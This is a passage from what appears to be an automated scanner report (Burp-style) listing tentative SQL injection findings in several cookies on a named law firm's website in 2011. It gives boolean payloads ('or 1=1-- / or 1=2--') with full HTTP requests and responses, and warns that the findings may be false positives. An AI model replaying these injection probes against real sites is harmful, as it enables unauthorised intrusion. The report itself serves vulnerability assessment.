<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.17. http://www.pillsburylaw.com/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 39331056'%20or%201%3d1--%20 and 39331056'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.139331056'%20or%201%3d1--%20; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:09:33 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.139331056'%20or%201%3d2--%20; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819578;path=/
Set-Cookie: CFTOKEN=19658861;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.18. http://www.pillsburylaw.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 20657778%20or%201%3d1--%20 and 20657778%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704620657778%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 19:52:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704620657778%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:52:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...
1.19. http://www.pillsburylaw.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 20149939'%20or%201%3d1--%20 and 20149939'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman20149939'%20or%201%3d1--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:09:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman20149939'%20or%201%3d2--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819600;path=/
Set-Cookie: CFTOKEN=46396247;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.20. http://www.pillsburylaw.com/ [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 27618018'%20or%201%3d1--%20 and 27618018'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4627618018'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:10:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4627618018'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819704;path=/
Set-Cookie: CFTOKEN=62527523;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.21. http://www.pillsburylaw.com/ [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 14667953'%20or%201%3d1--%20 and 14667953'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4114667953'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:09:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4114667953'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819615;path=/
Set-Cookie: CFTOKEN=31184202;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


